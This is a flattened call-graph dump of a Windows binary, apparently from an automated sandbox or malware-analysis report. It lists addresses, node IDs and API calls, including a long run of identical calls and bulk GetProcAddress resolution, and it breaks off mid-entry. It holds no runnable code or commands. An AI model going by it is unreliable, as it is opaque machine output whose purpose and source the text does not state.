41aa50 lstrcpy 44712->44713 44714 415d7e 44713->44714 44946 41ab30 lstrlenA 44714->44946 44717 41ab30 2 API calls 44718 415db4 44717->44718 44719 41ab30 2 API calls 44718->44719 44720 415dc4 44719->44720 44950 416680 44720->44950 44723 41ab30 2 API calls 44724 415de3 44723->44724 44725 41ab30 2 API calls 44724->44725 44726 415df0 44725->44726 44727 41ab30 2 API calls 44726->44727 44728 415dfd 44727->44728 44729 41ab30 2 API calls 44728->44729 44730 415e49 44729->44730 44959 4026f0 44730->44959 44738 415f13 44739 416680 lstrcpy 44738->44739 44740 415f25 44739->44740 44741 41aab0 lstrcpy 44740->44741 44742 415f42 44741->44742 44743 41acc0 4 API calls 44742->44743 44744 415f5a 44743->44744 44745 41abb0 lstrcpy 44744->44745 44746 415f66 44745->44746 44747 41acc0 4 API calls 44746->44747 44748 415f8a 44747->44748 44749 41abb0 lstrcpy 44748->44749 44750 415f96 44749->44750 44751 41acc0 4 API calls 44750->44751 44752 415fba 44751->44752 44753 41abb0 lstrcpy 44752->44753 44754 415fc6 44753->44754 44755 41aa50 lstrcpy 44754->44755 44756 415fee 44755->44756 45685 417690 GetWindowsDirectoryA 44756->45685 44759 41aab0 lstrcpy 44760 416008 44759->44760 45695 4048d0 44760->45695 44762 41600e 45840 4119f0 44762->45840 44764 416016 44765 41aa50 lstrcpy 44764->44765 44766 416039 44765->44766 44767 401590 lstrcpy 44766->44767 44768 41604d 44767->44768 45860 4059b0 39 API calls ctype 44768->45860 44770 416053 45861 411280 strtok_s strtok_s lstrlenA lstrcpy 44770->45861 44772 41605e 44773 41aa50 lstrcpy 44772->44773 44774 416082 44773->44774 44775 401590 lstrcpy 44774->44775 44776 416096 44775->44776 45862 4059b0 39 API calls ctype 44776->45862 44778 41609c 45863 410fc0 7 API calls 44778->45863 44780 4160a7 44781 41aa50 lstrcpy 44780->44781 44782 4160c9 44781->44782 44783 401590 lstrcpy 44782->44783 44784 4160dd 44783->44784 45864 4059b0 39 API calls ctype 44784->45864 44786 4160e3 45865 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 44786->45865 44788 4160ee 44789 401590 lstrcpy 44788->44789 44790 416105 44789->44790 45866 411c60 121 API calls 44790->45866 44792 41610a 44793 41aa50 lstrcpy 44792->44793 44794 416126 44793->44794 45867 405000 8 API calls 44794->45867 44796 41612b 44797 401590 lstrcpy 44796->44797 44798 4161ab 44797->44798 45868 4108a0 338 API calls 44798->45868 44800 4161b0 44801 41aa50 lstrcpy 44800->44801 44802 4161d6 44801->44802 44803 401590 lstrcpy 44802->44803 44804 4161ea 44803->44804 45869 4059b0 39 API calls ctype 44804->45869 44806 4161f0 45870 4113c0 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 44806->45870 44808 4161fb 44809 401590 lstrcpy 44808->44809 44810 41623b 44809->44810 45871 401ec0 67 API calls 44810->45871 44812 416240 44813 416250 44812->44813 44814 4162e2 44812->44814 44815 41aa50 lstrcpy 44813->44815 44816 41aab0 lstrcpy 44814->44816 44817 416270 44815->44817 44818 4162f5 44816->44818 44820 401590 lstrcpy 44817->44820 44819 401590 lstrcpy 44818->44819 44821 416309 44819->44821 44822 416284 44820->44822 45875 4059b0 39 API calls ctype 44821->45875 45872 4059b0 39 API calls ctype 44822->45872 44825 41630f 45876 4137b0 36 API calls 44825->45876 44826 41628a 45873 411520 21 API calls ctype 44826->45873 44829 4162da 44832 41635b 44829->44832 44835 401590 lstrcpy 44829->44835 44830 416295 44831 401590 lstrcpy 44830->44831 44833 4162d5 44831->44833 44834 416380 44832->44834 44837 401590 lstrcpy 44832->44837 45874 414010 75 API calls 44833->45874 44838 4163a5 44834->44838 44841 401590 lstrcpy 44834->44841 44839 416337 44835->44839 44840 41637b 44837->44840 44843 4163ca 44838->44843 44848 401590 lstrcpy 44838->44848 45877 414300 64 API calls ctype 44839->45877 45879 4149d0 101 API calls ctype 44840->45879 44846 4163a0 44841->44846 44844 4163ef 44843->44844 44849 401590 lstrcpy 44843->44849 44850 416414 44844->44850 44856 401590 lstrcpy 44844->44856 45880 414e00 67 API calls ctype 44846->45880 44847 41633c 44852 401590 lstrcpy 44847->44852 44853 4163c5 44848->44853 44855 4163ea 44849->44855 44858 416439 44850->44858 44859 401590 lstrcpy 44850->44859 44857 416356 44852->44857 45881 414fc0 75 API calls 44853->45881 45882 415190 69 API calls ctype 44855->45882 44862 41640f 44856->44862 45878 415350 71 API calls 44857->45878 44860 416460 44858->44860 44865 401590 lstrcpy 44858->44865 44864 416434 44859->44864 44866 416470 44860->44866 44867 416503 44860->44867 45883 407770 125 API calls ctype 44862->45883 45884 4152a0 67 API calls ctype 44864->45884 44870 416459 44865->44870 44872 41aa50 lstrcpy 44866->44872 44871 41aab0 lstrcpy 44867->44871 45885 4191a0 54 API calls ctype 44870->45885 44874 416516 44871->44874 44875 416491 44872->44875 44876 401590 lstrcpy 44874->44876 44877 401590 lstrcpy 44875->44877 44878 41652a 44876->44878 44879 4164a5 44877->44879 45889 4059b0 39 API calls ctype 44878->45889 45886 4059b0 39 API calls ctype 44879->45886 44882 4164ab 45887 411520 21 API calls ctype 44882->45887 44883 416530 45890 4137b0 36 API calls 44883->45890 44886 4164fb 44889 41aab0 lstrcpy 44886->44889 44887 4164b6 44888 401590 lstrcpy 44887->44888 44890 4164f6 44888->44890 44891 41654c 44889->44891 45888 414010 75 API calls 44890->45888 44893 401590 lstrcpy 44891->44893 44894 416560 44893->44894 45891 4059b0 39 API calls ctype 44894->45891 44896 41656c 44898 416588 44896->44898 45892 4168d0 9 API calls ctype 44896->45892 44898->44555 44900 4046e7 44899->44900 44901 4046fc 11 API calls 44900->44901 44902 40479f 6 API calls 44900->44902 44901->44900 44902->44559 44903->44646 44906 4010c2 ctype 44904->44906 44905 4010fd 44905->44676 44906->44905 44907 4010e2 VirtualFree 44906->44907 44907->44905 44909 401233 GlobalMemoryStatusEx 44908->44909 44909->44679 44910->44692 44912 41aad2 44911->44912 44913 41aafc 44912->44913 44914 41aaea lstrcpy 44912->44914 44913->44697 44914->44913 44916 41aa50 lstrcpy 44915->44916 44917 416ad3 44916->44917 44918 41acc0 4 API calls 44917->44918 44919 416ae5 44918->44919 44920 41abb0 lstrcpy 44919->44920 44921 416aee 44920->44921 44922 41acc0 4 API calls 44921->44922 44923 416b07 44922->44923 44924 41abb0 lstrcpy 44923->44924 44925 416b10 44924->44925 44926 41acc0 4 API calls 44925->44926 44927 416b2a 44926->44927 44928 41abb0 lstrcpy 44927->44928 44929 416b33 44928->44929 44930 41acc0 4 API calls 44929->44930 44931 416b4c 44930->44931 44932 41abb0 lstrcpy 44931->44932 44933 416b55 44932->44933 44934 41acc0 4 API calls 44933->44934 44935 416b6f 44934->44935 44936 41abb0 lstrcpy 44935->44936 44937 416b78 44936->44937 44938 41acc0 4 API calls 44937->44938 44939 416b93 44938->44939 44940 41abb0 lstrcpy 44939->44940 44941 416b9c 44940->44941 44942 41aab0 lstrcpy 44941->44942 44943 416bb0 44942->44943 44943->44704 44945 41ab22 44944->44945 44945->44707 44947 41ab4f 44946->44947 44948 415da4 44947->44948 44949 41ab8b lstrcpy 44947->44949 44948->44717 44949->44948 44951 41abb0 lstrcpy 44950->44951 44952 416693 44951->44952 44953 41abb0 lstrcpy 44952->44953 44954 4166a5 44953->44954 44955 41abb0 lstrcpy 44954->44955 44956 4166b7 44955->44956 44957 41abb0 lstrcpy 44956->44957 44958 415dd6 44957->44958 44958->44723 44960 404610 34 API calls 44959->44960 44961 402704 44960->44961 44962 404610 34 API calls 44961->44962 44963 402727 44962->44963 44964 404610 34 API calls 44963->44964 44965 402740 44964->44965 44966 404610 34 API calls 44965->44966 44967 402759 44966->44967 44968 404610 34 API calls 44967->44968 44969 402786 44968->44969 44970 404610 34 API calls 44969->44970 44971 40279f 44970->44971 44972 404610 34 API calls 44971->44972 44973 4027b8 44972->44973 44974 404610 34 API calls 44973->44974 44975 4027e5 44974->44975 44976 404610 34 API calls 44975->44976 44977 4027fe 44976->44977 44978 404610 34 API calls 44977->44978 44979 402817 44978->44979 44980 404610 34 API calls 44979->44980 44981 402830 44980->44981 44982 404610 34 API calls 44981->44982 44983 402849 44982->44983 44984 404610 34 API calls 44983->44984 44985 402862 44984->44985 44986 404610 34 API calls 44985->44986 44987 40287b 44986->44987 44988 404610 34 API calls 44987->44988 44989 402894 44988->44989 44990 404610 34 API calls 44989->44990 44991 4028ad 44990->44991 44992 404610 34 API calls 44991->44992 44993 4028c6 44992->44993 44994 404610 34 API calls 44993->44994 44995 4028df 44994->44995 44996 404610 34 API calls 44995->44996 44997 4028f8 44996->44997 44998 404610 34 API calls 44997->44998 44999 402911 44998->44999 45000 404610 34 API calls 44999->45000 45001 40292a 45000->45001 45002 404610 34 API calls 45001->45002 45003 402943 45002->45003 45004 404610 34 API calls 45003->45004 45005 40295c 45004->45005 45006 404610 34 API calls 45005->45006 45007 402975 45006->45007 45008 404610 34 API calls 45007->45008 45009 40298e 45008->45009 45010 404610 34 API calls 45009->45010 45011 4029a7 45010->45011 45012 404610 34 API calls 45011->45012 45013 4029c0 45012->45013 45014 404610 34 API calls 45013->45014 45015 4029d9 45014->45015 45016 404610 34 API calls 45015->45016 45017 4029f2 45016->45017 45018 404610 34 API calls 45017->45018 45019 402a0b 45018->45019 45020 404610 34 API calls 45019->45020 45021 402a24 45020->45021 45022 404610 34 API calls 45021->45022 45023 402a3d 45022->45023 45024 404610 34 API calls 45023->45024 45025 402a56 45024->45025 45026 404610 34 API calls 45025->45026 45027 402a6f 45026->45027 45028 404610 34 API calls 45027->45028 45029 402a88 45028->45029 45030 404610 34 API calls 45029->45030 45031 402aa1 45030->45031 45032 404610 34 API calls 45031->45032 45033 402aba 45032->45033 45034 404610 34 API calls 45033->45034 45035 402ad3 45034->45035 45036 404610 34 API calls 45035->45036 45037 402aec 45036->45037 45038 404610 34 API calls 45037->45038 45039 402b05 45038->45039 45040 404610 34 API calls 45039->45040 45041 402b1e 45040->45041 45042 404610 34 API calls 45041->45042 45043 402b37 45042->45043 45044 404610 34 API calls 45043->45044 45045 402b50 45044->45045 45046 404610 34 API calls 45045->45046 45047 402b69 45046->45047 45048 404610 34 API calls 45047->45048 45049 402b82 45048->45049 45050 404610 34 API calls 45049->45050 45051 402b9b 45050->45051 45052 404610 34 API calls 45051->45052 45053 402bb4 45052->45053 45054 404610 34 API calls 45053->45054 45055 402bcd 45054->45055 45056 404610 34 API calls 45055->45056 45057 402be6 45056->45057 45058 404610 34 API calls 45057->45058 45059 402bff 45058->45059 45060 404610 34 API calls 45059->45060 45061 402c18 45060->45061 45062 404610 34 API calls 45061->45062 45063 402c31 45062->45063 45064 404610 34 API calls 45063->45064 45065 402c4a 45064->45065 45066 404610 34 API calls 45065->45066 45067 402c63 45066->45067 45068 404610 34 API calls 45067->45068 45069 402c7c 45068->45069 45070 404610 34 API calls 45069->45070 45071 402c95 45070->45071 45072 404610 34 API calls 45071->45072 45073 402cae 45072->45073 45074 404610 34 API calls 45073->45074 45075 402cc7 45074->45075 45076 404610 34 API calls 45075->45076 45077 402ce0 45076->45077 45078 404610 34 API calls 45077->45078 45079 402cf9 45078->45079 45080 404610 34 API calls 45079->45080 45081 402d12 45080->45081 45082 404610 34 API calls 45081->45082 45083 402d2b 45082->45083 45084 404610 34 API calls 45083->45084 45085 402d44 45084->45085 45086 404610 34 API calls 45085->45086 45087 402d5d 45086->45087 45088 404610 34 API calls 45087->45088 45089 402d76 45088->45089 45090 404610 34 API calls 45089->45090 45091 402d8f 45090->45091 45092 404610 34 API calls 45091->45092 45093 402da8 45092->45093 45094 404610 34 API calls 45093->45094 45095 402dc1 45094->45095 45096 404610 34 API calls 45095->45096 45097 402dda 45096->45097 45098 404610 34 API calls 45097->45098 45099 402df3 45098->45099 45100 404610 34 API calls 45099->45100 45101 402e0c 45100->45101 45102 404610 34 API calls 45101->45102 45103 402e25 45102->45103 45104 404610 34 API calls 45103->45104 45105 402e3e 45104->45105 45106 404610 34 API calls 45105->45106 45107 402e57 45106->45107 45108 404610 34 API calls 45107->45108 45109 402e70 45108->45109 45110 404610 34 API calls 45109->45110 45111 402e89 45110->45111 45112 404610 34 API calls 45111->45112 45113 402ea2 45112->45113 45114 404610 34 API calls 45113->45114 45115 402ebb 45114->45115 45116 404610 34 API calls 45115->45116 45117 402ed4 45116->45117 45118 404610 34 API calls 45117->45118 45119 402eed 45118->45119 45120 404610 34 API calls 45119->45120 45121 402f06 45120->45121 45122 404610 34 API calls 45121->45122 45123 402f1f 45122->45123 45124 404610 34 API calls 45123->45124 45125 402f38 45124->45125 45126 404610 34 API calls 45125->45126 45127 402f51 45126->45127 45128 404610 34 API calls 45127->45128 45129 402f6a 45128->45129 45130 404610 34 API calls 45129->45130 45131 402f83 45130->45131 45132 404610 34 API calls 45131->45132 45133 402f9c 45132->45133 45134 404610 34 API calls 45133->45134 45135 402fb5 45134->45135 45136 404610 34 API calls 45135->45136 45137 402fce 45136->45137 45138 404610 34 API calls 45137->45138 45139 402fe7 45138->45139 45140 404610 34 API calls 45139->45140 45141 403000 45140->45141 45142 404610 34 API calls 45141->45142 45143 403019 45142->45143 45144 404610 34 API calls 45143->45144 45145 403032 45144->45145 45146 404610 34 API calls 45145->45146 45147 40304b 45146->45147 45148 404610 34 API calls 45147->45148 45149 403064 45148->45149 45150 404610 34 API calls 45149->45150 45151 40307d 45150->45151 45152 404610 34 API calls 45151->45152 45153 403096 45152->45153 45154 404610 34 API calls 45153->45154 45155 4030af 45154->45155 45156 404610 34 API calls 45155->45156 45157 4030c8 45156->45157 45158 404610 34 API calls 45157->45158 45159 4030e1 45158->45159 45160 404610 34 API calls 45159->45160 45161 4030fa 45160->45161 45162 404610 34 API calls 45161->45162 45163 403113 45162->45163 45164 404610 34 API calls 45163->45164 45165 40312c 45164->45165 45166 404610 34 API calls 45165->45166 45167 403145 45166->45167 45168 404610 34 API calls 45167->45168 45169 40315e 45168->45169 45170 404610 34 API calls 45169->45170 45171 403177 45170->45171 45172 404610 34 API calls 45171->45172 45173 403190 45172->45173 45174 404610 34 API calls 45173->45174 45175 4031a9 45174->45175 45176 404610 34 API calls 45175->45176 45177 4031c2 45176->45177 45178 404610 34 API calls 45177->45178 45179 4031db 45178->45179 45180 404610 34 API calls 45179->45180 45181 4031f4 45180->45181 45182 404610 34 API calls 45181->45182 45183 40320d 45182->45183 45184 404610 34 API calls 45183->45184 45185 403226 45184->45185 45186 404610 34 API calls 45185->45186 45187 40323f 45186->45187 45188 404610 34 API calls 45187->45188 45189 403258 45188->45189 45190 404610 34 API calls 45189->45190 45191 403271 45190->45191 45192 404610 34 API calls 45191->45192 45193 40328a 45192->45193 45194 404610 34 API calls 45193->45194 45195 4032a3 45194->45195 45196 404610 34 API calls 45195->45196 45197 4032bc 45196->45197 45198 404610 34 API calls 45197->45198 45199 4032d5 45198->45199 45200 404610 34 API calls 45199->45200 45201 4032ee 45200->45201 45202 404610 34 API calls 45201->45202 45203 403307 45202->45203 45204 404610 34 API calls 45203->45204 45205 403320 45204->45205 45206 404610 34 API calls 45205->45206 45207 403339 45206->45207 45208 404610 34 API calls 45207->45208 45209 403352 45208->45209 45210 404610 34 API calls 45209->45210 45211 40336b 45210->45211 45212 404610 34 API calls 45211->45212 45213 403384 45212->45213 45214 404610 34 API calls 45213->45214 45215 40339d 45214->45215 45216 404610 34 API calls 45215->45216 45217 4033b6 45216->45217 45218 404610 34 API calls 45217->45218 45219 4033cf 45218->45219 45220 404610 34 API calls 45219->45220 45221 4033e8 45220->45221 45222 404610 34 API calls 45221->45222 45223 403401 45222->45223 45224 404610 34 API calls 45223->45224 45225 40341a 45224->45225 45226 404610 34 API calls 45225->45226 45227 403433 45226->45227 45228 404610 34 API calls 45227->45228 45229 40344c 45228->45229 45230 404610 34 API calls 45229->45230 45231 403465 45230->45231 45232 404610 34 API calls 45231->45232 45233 40347e 45232->45233 45234 404610 34 API calls 45233->45234 45235 403497 45234->45235 45236 404610 34 API calls 45235->45236 45237 4034b0 45236->45237 45238 404610 34 API calls 45237->45238 45239 4034c9 45238->45239 45240 404610 34 API calls 45239->45240 45241 4034e2 45240->45241 45242 404610 34 API calls 45241->45242 45243 4034fb 45242->45243 45244 404610 34 API calls 45243->45244 45245 403514 45244->45245 45246 404610 34 API calls 45245->45246 45247 40352d 45246->45247 45248 404610 34 API calls 45247->45248 45249 403546 45248->45249 45250 404610 34 API calls 45249->45250 45251 40355f 45250->45251 45252 404610 34 API calls 45251->45252 45253 403578 45252->45253 45254 404610 34 API calls 45253->45254 45255 403591 45254->45255 45256 404610 34 API calls 45255->45256 45257 4035aa 45256->45257 45258 404610 34 API calls 45257->45258 45259 4035c3 45258->45259 45260 404610 34 API calls 45259->45260 45261 4035dc 45260->45261 45262 404610 34 API calls 45261->45262 45263 4035f5 45262->45263 45264 404610 34 API calls 45263->45264 45265 40360e 45264->45265 45266 404610 34 API calls 45265->45266 45267 403627 45266->45267 45268 404610 34 API calls 45267->45268 45269 403640 45268->45269 45270 404610 34 API calls 45269->45270 45271 403659 45270->45271 45272 404610 34 API calls 45271->45272 45273 403672 45272->45273 45274 404610 34 API calls 45273->45274 45275 40368b 45274->45275 45276 404610 34 API calls 45275->45276 45277 4036a4 45276->45277 45278 404610 34 API calls 45277->45278 45279 4036bd 45278->45279 45280 404610 34 API calls 45279->45280 45281 4036d6 45280->45281 45282 404610 34 API calls 45281->45282 45283 4036ef 45282->45283 45284 404610 34 API calls 45283->45284 45285 403708 45284->45285 45286 404610 34 API calls 45285->45286 45287 403721 45286->45287 45288 404610 34 API calls 45287->45288 45289 40373a 45288->45289 45290 404610 34 API calls 45289->45290 45291 403753 45290->45291 45292 404610 34 API calls 45291->45292 45293 40376c 45292->45293 45294 404610 34 API calls 45293->45294 45295 403785 45294->45295 45296 404610 34 API calls 45295->45296 45297 40379e 45296->45297 45298 404610 34 API calls 45297->45298 45299 4037b7 45298->45299 45300 404610 34 API calls 45299->45300 45301 4037d0 45300->45301 45302 404610 34 API calls 45301->45302 45303 4037e9 45302->45303 45304 404610 34 API calls 45303->45304 45305 403802 45304->45305 45306 404610 34 API calls 45305->45306 45307 40381b 45306->45307 45308 404610 34 API calls 45307->45308 45309 403834 45308->45309 45310 404610 34 API calls 45309->45310 45311 40384d 45310->45311 45312 404610 34 API calls 45311->45312 45313 403866 45312->45313 45314 404610 34 API calls 45313->45314 45315 40387f 45314->45315 45316 404610 34 API calls 45315->45316 45317 403898 45316->45317 45318 404610 34 API calls 45317->45318 45319 4038b1 45318->45319 45320 404610 34 API calls 45319->45320 45321 4038ca 45320->45321 45322 404610 34 API calls 45321->45322 45323 4038e3 45322->45323 45324 404610 34 API calls 45323->45324 45325 4038fc 45324->45325 45326 404610 34 API calls 45325->45326 45327 403915 45326->45327 45328 404610 34 API calls 45327->45328 45329 40392e 45328->45329 45330 404610 34 API calls 45329->45330 45331 403947 45330->45331 45332 404610 34 API calls 45331->45332 45333 403960 45332->45333 45334 404610 34 API calls 45333->45334 45335 403979 45334->45335 45336 404610 34 API calls 45335->45336 45337 403992 45336->45337 45338 404610 34 API calls 45337->45338 45339 4039ab 45338->45339 45340 404610 34 API calls 45339->45340 45341 4039c4 45340->45341 45342 404610 34 API calls 45341->45342 45343 4039dd 45342->45343 45344 404610 34 API calls 45343->45344 45345 4039f6 45344->45345 45346 404610 34 API calls 45345->45346 45347 403a0f 45346->45347 45348 404610 34 API calls 45347->45348 45349 403a28 45348->45349 45350 404610 34 API calls 45349->45350 45351 403a41 45350->45351 45352 404610 34 API calls 45351->45352 45353 403a5a 45352->45353 45354 404610 34 API calls 45353->45354 45355 403a73 45354->45355 45356 404610 34 API calls 45355->45356 45357 403a8c 45356->45357 45358 404610 34 API calls 45357->45358 45359 403aa5 45358->45359 45360 404610 34 API calls 45359->45360 45361 403abe 45360->45361 45362 404610 34 API calls 45361->45362 45363 403ad7 45362->45363 45364 404610 34 API calls 45363->45364 45365 403af0 45364->45365 45366 404610 34 API calls 45365->45366 45367 403b09 45366->45367 45368 404610 34 API calls 45367->45368 45369 403b22 45368->45369 45370 404610 34 API calls 45369->45370 45371 403b3b 45370->45371 45372 404610 34 API calls 45371->45372 45373 403b54 45372->45373 45374 404610 34 API calls 45373->45374 45375 403b6d 45374->45375 45376 404610 34 API calls 45375->45376 45377 403b86 45376->45377 45378 404610 34 API calls 45377->45378 45379 403b9f 45378->45379 45380 404610 34 API calls 45379->45380 45381 403bb8 45380->45381 45382 404610 34 API calls 45381->45382 45383 403bd1 45382->45383 45384 404610 34 API calls 45383->45384 45385 403bea 45384->45385 45386 404610 34 API calls 45385->45386 45387 403c03 45386->45387 45388 404610 34 API calls 45387->45388 45389 403c1c 45388->45389 45390 404610 34 API calls 45389->45390 45391 403c35 45390->45391 45392 404610 34 API calls 45391->45392 45393 403c4e 45392->45393 45394 404610 34 API calls 45393->45394 45395 403c67 45394->45395 45396 404610 34 API calls 45395->45396 45397 403c80 45396->45397 45398 404610 34 API calls 45397->45398 45399 403c99 45398->45399 45400 404610 34 API calls 45399->45400 45401 403cb2 45400->45401 45402 404610 34 API calls 45401->45402 45403 403ccb 45402->45403 45404 404610 34 API calls 45403->45404 45405 403ce4 45404->45405 45406 404610 34 API calls 45405->45406 45407 403cfd 45406->45407 45408 404610 34 API calls 45407->45408 45409 403d16 45408->45409 45410 404610 34 API calls 45409->45410 45411 403d2f 45410->45411 45412 404610 34 API calls 45411->45412 45413 403d48 45412->45413 45414 404610 34 API calls 45413->45414 45415 403d61 45414->45415 45416 404610 34 API calls 45415->45416 45417 403d7a 45416->45417 45418 404610 34 API calls 45417->45418 45419 403d93 45418->45419 45420 404610 34 API calls 45419->45420 45421 403dac 45420->45421 45422 404610 34 API calls 45421->45422 45423 403dc5 45422->45423 45424 404610 34 API calls 45423->45424 45425 403dde 45424->45425 45426 404610 34 API calls 45425->45426 45427 403df7 45426->45427 45428 404610 34 API calls 45427->45428 45429 403e10 45428->45429 45430 404610 34 API calls 45429->45430 45431 403e29 45430->45431 45432 404610 34 API calls 45431->45432 45433 403e42 45432->45433 45434 404610 34 API calls 45433->45434 45435 403e5b 45434->45435 45436 404610 34 API calls 45435->45436 45437 403e74 45436->45437 45438 404610 34 API calls 45437->45438 45439 403e8d 45438->45439 45440 404610 34 API calls 45439->45440 45441 403ea6 45440->45441 45442 404610 34 API calls 45441->45442 45443 403ebf 45442->45443 45444 404610 34 API calls 45443->45444 45445 403ed8 45444->45445 45446 404610 34 API calls 45445->45446 45447 403ef1 45446->45447 45448 404610 34 API calls 45447->45448 45449 403f0a 45448->45449 45450 404610 34 API calls 45449->45450 45451 403f23 45450->45451 45452 404610 34 API calls 45451->45452 45453 403f3c 45452->45453 45454 404610 34 API calls 45453->45454 45455 403f55 45454->45455 45456 404610 34 API calls 45455->45456 45457 403f6e 45456->45457 45458 404610 34 API calls 45457->45458 45459 403f87 45458->45459 45460 404610 34 API calls 45459->45460 45461 403fa0 45460->45461 45462 404610 34 API calls 45461->45462 45463 403fb9 45462->45463 45464 404610 34 API calls 45463->45464 45465 403fd2 45464->45465 45466 404610 34 API calls 45465->45466 45467 403feb 45466->45467 45468 404610 34 API calls 45467->45468 45469 404004 45468->45469 45470 404610 34 API calls 45469->45470 45471 40401d 45470->45471 45472 404610 34 API calls 45471->45472 45473 404036 45472->45473 45474 404610 34 API calls 45473->45474 45475 40404f 45474->45475 45476 404610 34 API calls 45475->45476 45477 404068 45476->45477 45478 404610 34 API calls 45477->45478 45479 404081 45478->45479 45480 404610 34 API calls 45479->45480 45481 40409a 45480->45481 45482 404610 34 API calls 45481->45482 45483 4040b3 45482->45483 45484 404610 34 API calls 45483->45484 45485 4040cc 45484->45485 45486 404610 34 API calls 45485->45486 45487 4040e5 45486->45487 45488 404610 34 API calls 45487->45488 45489 4040fe 45488->45489 45490 404610 34 API calls 45489->45490 45491 404117 45490->45491 45492 404610 34 API calls 45491->45492 45493 404130 45492->45493 45494 404610 34 API calls 45493->45494 45495 404149 45494->45495 45496 404610 34 API calls 45495->45496 45497 404162 45496->45497 45498 404610 34 API calls 45497->45498 45499 40417b 45498->45499 45500 404610 34 API calls 45499->45500 45501 404194 45500->45501 45502 404610 34 API calls 45501->45502 45503 4041ad 45502->45503 45504 404610 34 API calls 45503->45504 45505 4041c6 45504->45505 45506 404610 34 API calls 45505->45506 45507 4041df 45506->45507 45508 404610 34 API calls 45507->45508 45509 4041f8 45508->45509 45510 404610 34 API calls 45509->45510 45511 404211 45510->45511 45512 404610 34 API calls 45511->45512 45513 40422a 45512->45513 45514 404610 34 API calls 45513->45514 45515 404243 45514->45515 45516 404610 34 API calls 45515->45516 45517 40425c 45516->45517 45518 404610 34 API calls 45517->45518 45519 404275 45518->45519 45520 404610 34 API calls 45519->45520 45521 40428e 45520->45521 45522 404610 34 API calls 45521->45522 45523 4042a7 45522->45523 45524 404610 34 API calls 45523->45524 45525 4042c0 45524->45525 45526 404610 34 API calls 45525->45526 45527 4042d9 45526->45527 45528 404610 34 API calls 45527->45528 45529 4042f2 45528->45529 45530 404610 34 API calls 45529->45530 45531 40430b 45530->45531 45532 404610 34 API calls 45531->45532 45533 404324 45532->45533 45534 404610 34 API calls 45533->45534 45535 40433d 45534->45535 45536 404610 34 API calls 45535->45536 45537 404356 45536->45537 45538 404610 34 API calls 45537->45538 45539 40436f 45538->45539 45540 404610 34 API calls 45539->45540 45541 404388 45540->45541 45542 404610 34 API calls 45541->45542 45543 4043a1 45542->45543 45544 404610 34 API calls 45543->45544 45545 4043ba 45544->45545 45546 404610 34 API calls 45545->45546 45547 4043d3 45546->45547 45548 404610 34 API calls 45547->45548 45549 4043ec 45548->45549 45550 404610 34 API calls 45549->45550 45551 404405 45550->45551 45552 404610 34 API calls 45551->45552 45553 40441e 45552->45553 45554 404610 34 API calls 45553->45554 45555 404437 45554->45555 45556 404610 34 API calls 45555->45556 45557 404450 45556->45557 45558 404610 34 API calls 45557->45558 45559 404469 45558->45559 45560 404610 34 API calls 45559->45560 45561 404482 45560->45561 45562 404610 34 API calls 45561->45562 45563 40449b 45562->45563 45564 404610 34 API calls 45563->45564 45565 4044b4 45564->45565 45566 404610 34 API calls 45565->45566 45567 4044cd 45566->45567 45568 404610 34 API calls 45567->45568 45569 4044e6 45568->45569 45570 404610 34 API calls 45569->45570 45571 4044ff 45570->45571 45572 404610 34 API calls 45571->45572 45573 404518 45572->45573 45574 404610 34 API calls 45573->45574 45575 404531 45574->45575 45576 404610 34 API calls 45575->45576 45577 40454a 45576->45577 45578 404610 34 API calls 45577->45578 45579 404563 45578->45579 45580 404610 34 API calls 45579->45580 45581 40457c 45580->45581 45582 404610 34 API calls 45581->45582 45583 404595 45582->45583 45584 404610 34 API calls 45583->45584 45585 4045ae 45584->45585 45586 404610 34 API calls 45585->45586 45587 4045c7 45586->45587 45588 404610 34 API calls 45587->45588 45589 4045e0 45588->45589 45590 404610 34 API calls 45589->45590 45591 4045f9 45590->45591 45592 419f20 45591->45592 45593 419f30 43 API calls 45592->45593 45594 41a346 8 API calls 45592->45594 45593->45594 45595 41a456 45594->45595 45596 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45594->45596 45597 41a463 8 API calls 45595->45597 45598 41a526 45595->45598 45596->45595 45597->45598 45599 41a5a8 45598->45599 45600 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45598->45600 45601 41a5b5 6 API calls 45599->45601 45602 41a647 45599->45602 45600->45599 45601->45602 45603 41a654 9 API calls 45602->45603 45604 41a72f 45602->45604 45603->45604 45605 41a7b2 45604->45605 45606 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45604->45606 45607 41a7bb GetProcAddress GetProcAddress 45605->45607 45608 41a7ec 45605->45608 45606->45605 45607->45608 45609 41a825 45608->45609 45610 41a7f5 GetProcAddress GetProcAddress 45608->45610 45611 41a922 45609->45611 45612 41a832 10 API calls 45609->45612 45610->45609 45613 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45611->45613 45614 41a98d 45611->45614 45612->45611 45613->45614 45615 41a996 GetProcAddress 45614->45615 45616 41a9ae 45614->45616 45615->45616 45617 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45616->45617 45618 415ef3 45616->45618 45617->45618 45619 401590 45618->45619 45893 4016b0 45619->45893 45622 41aab0 lstrcpy 45623 4015b5 45622->45623 45624 41aab0 lstrcpy 45623->45624 45625 4015c7 45624->45625 45626 41aab0 lstrcpy 45625->45626 45627 4015d9 45626->45627 45628 41aab0 lstrcpy 45627->45628 45629 401663 45628->45629 45630 415760 45629->45630 45631 415771 45630->45631 45632 41ab30 2 API calls 45631->45632 45633 41577e 45632->45633 45634 41ab30 2 API calls 45633->45634 45635 41578b 45634->45635 45636 41ab30 2 API calls 45635->45636 45637 415798 45636->45637 45638 41aa50 lstrcpy 45637->45638 45639 4157a5 45638->45639 45640 41aa50 lstrcpy 45639->45640 45641 4157b2 45640->45641 45642 41aa50 lstrcpy 45641->45642 45643 4157bf 45642->45643 45644 41aa50 lstrcpy 45643->45644 45683 4157cc 45644->45683 45645 415440 23 API calls 45645->45683 45646 41abb0 lstrcpy 45646->45683 45647 415893 StrCmpCA 45647->45683 45648 4158f0 StrCmpCA 45649 415a2c 45648->45649 45648->45683 45651 41abb0 lstrcpy 45649->45651 45650 41aab0 lstrcpy 45650->45683 45652 415a38 45651->45652 45653 41ab30 2 API calls 45652->45653 45656 415a46 45653->45656 45654 41aa50 lstrcpy 45654->45683 45655 41ab30 lstrlenA lstrcpy 45655->45683 45658 41ab30 2 API calls 45656->45658 45657 415aa6 StrCmpCA 45659 